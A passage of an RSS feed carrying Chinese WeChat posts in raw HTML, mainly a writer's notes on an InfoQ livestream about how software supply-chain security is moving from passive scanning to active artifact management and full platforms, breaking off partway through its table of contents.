  </h2><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;">演讲者展示了&#34;制品图谱&#34;实践,通过自动化流程将制品部署信息回传给平台。这使得团队成员可以轻松查看某个需求在特定环境中的部署状态和时间,大大减少了沟通协作的成本。</span></section><section style="text-align: left;margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;margin-top: 0pt;margin-bottom: 24px;"><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;background:#FF00FF;mso-highlight:#FF00FF;">【思】有点数字化的味道，同道中人，携手同行</span><span style="font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;"></span>    <o:page></o:page></section><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484067">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=f42f0237&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3NTc4NDAxMA%3D%3D%26mid%3D2247484067%26idx%3D1%26sn%3D7ef948aff1fd496d85ad1a8105d7b104%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 11 Jul 2024 21:03:00 +0800</pubDate>
    </item>
    <item>
      <title>软件供应链安全的进化:从“抗生素”到”基因疗法”</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247484062&amp;idx=1&amp;sn=093adf53b53e1d9a94a74bceac79e111</link>
      <description>从被动防御到主动管理,从单点工具到全面平台,从简单扫描到深度分析,软件供应链安全正在经历一场深刻的变革。</description>
      <content:encoded><![CDATA[<p>
原创 <span>Nüwa</span> <span>2024-07-06 16:03</span> <span style="display: inline-block;">美国</span>
</p>

<p>从被动防御到主动管理,从单点工具到全面平台,从简单扫描到深度分析,软件供应链安全正在经历一场深刻的变革。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=4f3a32de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FFStUibflSINytGR2wdgOdIHAj7kJeyAS3ibe9NxJiaDRL837Z6H4JKcbDqicAWUicUfibMIZUetjkhbMPiconeOicba1oA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">InfoQ近期组织的全球软件供应链发展报告解读直播,通过新鲜的案例和纯粹的技术讨论,展现了软件供应链安全领域的转变。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">从被动防御到主动管理,从单点工具到全面平台,从简单扫描到深度分析，安全行业正在向更加主动、全面和适应性强的方向脚踏实地发展,同时也面临着新技术带来的诸多挑战。</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 1;"><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">金句摘抄</span></p><section style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;text-align: left;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 持续的安全建模与评估</span></section><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;mso-font-kerning:0.0pt;">安全永远在建模</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">！&#34;这句话突出了安全管理是一个持续过程。企业需要不断评估和调整安全策略。</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><section style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;text-align: left;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 从被动扫描到主动制品管理</span></section><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;mso-font-kerning:0.0pt;">你不拥有它，你就没法保证它的安全</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;,说明从传统的被动扫描向主动制品管理转变的重要性。企业正在建立内部公共仓库，以更好地管理软件供应链安全。</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><section style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;text-align: left;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">.<span style="mso-spacerun:yes;">  </span>先进厂商的技术架构与产品设计值得借鉴</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></section><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;text-align: left;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;目前市面上没有一款工具能解决所有问题，</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;mso-font-kerning:0.0pt;">每个工具都有其特定的功能和局限性</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">。&#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;text-align: left;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;高级扫描套件，支持源代码扫描，基于上下文分析, 左移到IDE，形成从开源包组件隔离到安全可信发布的完整平台...…</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;mso-font-kerning:0.0pt;">我们的用户非常的喜欢</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">。&#34;</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><section style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;text-align: left;margin-bottom: 24px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">市场正在从单一的安全扫描工具向全方位的软件供应链安全平台发展</span>    <o:page></o:page></section><section style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;font-weight: normal;text-align: left;margin-bottom: 8px;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">. 开源社区和语言包的快速发展</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></section><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">“数据显示开源语言包呈现快速增长趋势，特别是</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;mso-font-kerning:0.0pt;">docker hub、npm和golang</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">”。这不仅反映了开发者的技术偏好、不同语言和平台的发展步伐。</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:10.0pt;mso-bidi-font-size:10.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">*我是制品库、安全工具的深度用户，也常线下请教老师，回看整理笔记后，继续践行知识搬运工角色，分享学习笔记，大家共同学习、讨论和进步。以下内容根据会议笔记整理，错误疏漏难免，请以InfoQ直播回放内容为准，</span><span style="text-indent: 0pt;letter-spacing: 0.034em;font-size: 10pt;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">部分口头内容由LLM总结要点，有2个部分标注为LLM增补。</span><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">  </span></p><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="338" valign="top" style="width: 248.2pt;border-width: initial;border-style: none;border-color: initial;padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:20.0pt;mso-bidi-font-size:20.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">目录</span><span style="font-size:20.0pt;mso-bidi-font-size:20.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p></td></tr><tr><td width="338" valign="top" style="width: 253.2pt;border-width: initial;border-style: none;border-color: initial;padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">- </span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">1. </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">软件供应链安全管理策略与最佳实践</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">&#34;</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">安全永远在建模！</span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">&#34;</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">中美政策</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">未来发展趋势</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">漏洞风险评估与管理</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">2024</span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">全球软件供应链发展报告</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">- </span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">2. </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">软件供应链安全技术创新与应用</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">技术：二进制和镜像扫描</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;">技术：隔离仓库管理第三方依赖</span><span style="font-size:11.0pt;font-family:宋体;mso-ascii-font-family:宋体;mso-fareast-font-family:宋体;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">    - </span><span 